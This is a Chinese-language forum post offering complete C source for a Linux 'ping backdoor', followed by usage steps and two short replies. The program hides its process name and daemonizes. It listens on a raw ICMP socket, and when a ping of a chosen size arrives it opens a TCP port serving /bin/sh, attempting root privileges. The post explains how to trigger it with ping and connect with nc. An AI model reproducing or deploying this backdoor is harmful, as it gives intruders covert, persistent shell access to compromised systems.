Linux后门之ping后门

Jumbo

pingshell.c

#include <signal.h>
#include <netinet/ip.h>
#include <netdb.h>

int SIZEPACK, PORT;

void child_kill()
{
  wait(NULL);
  signal(SIGCHLD, child_kill);
}

int bind_shell()
{  
  int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
  struct sockaddr_in serv_addr;
  struct sockaddr_in client_addr;

  setuid(0);
  setgid(0);
  seteuid(0);
  setegid(0);
                  
  chdir("/");

  soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

  if (soc_des == -1)
    exit(-1);

  bzero((char *) &serv_addr,sizeof(serv_addr));
  
  serv_addr.sin_family = AF_INET;
  serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
  serv_addr.sin_port = htons(PORT);
  soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));

  if (soc_rc != 0)
    exit(-1);
  
  if (fork() != 0)
    exit(0);

  setpgrp();

  if (fork() != 0)
    exit(0);

  soc_rc = listen(soc_des, 5);
  if (soc_rc != 0)
    exit(0);

  while (1)
    {
      soc_len = sizeof(client_addr);
      soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);

      if (soc_cli < 0)
        exit(0);
      
      cli_pid = getpid();
      server_pid = fork();
      
      if (server_pid != 0)
        {
          dup2(soc_cli,0);
          dup2(soc_cli,1);
          dup2(soc_cli,2);
          execl("/bin/sh","sh",(char *)0);
          close(soc_cli);
          return 1;
        }
      
      close(soc_cli);
    }
}

int main(int argc, char *argv[])
{
  
  int s, size, fromlen;
  char pkt[4096];

  struct protoent *proto;
  struct sockaddr_in from;

  if(argc < 3) {
    printf("usage: %s packet_size port\n", argv[0]);
    exit(0);
  }

  SIZEPACK = atoi(argv[1]);
  PORT = atoi(argv[2]);

  strcpy(argv[0], (char *)strcat(argv[0], "                             "));

  signal(SIGHUP,SIG_IGN);
  signal(SIGCHLD, child_kill);

  if (fork() != 0) exit(0);

  proto = getprotobyname("icmp");  

  if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0)
    exit(0);

  while(1)
    {
      do
        {
          fromlen = sizeof(from);
          if ((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr *) &from, &fromlen)) < 0)
            printf("ping of %i\n", size-28);
          
        } while (size != SIZEPACK + 28);

      switch(fork())          {
      case -1:
        continue;                    
      case 0:
        bind_shell();
        exit(0);
      }              
      sleep(15);
    }
} 使用方法:

   首先编译pingshell.c后门, 编译后生成的pingshell这个文件就是我们的后门了，然后使用命令

pingshell 1017 5555，意思是当接受当ping包长度为1017时监听本地5555端口，ping -l 1017 127.0.0.1

然后用nc进行连接，nc -nvv ip 5555即可。

这是什么东东啊

谢谢楼主，共同发展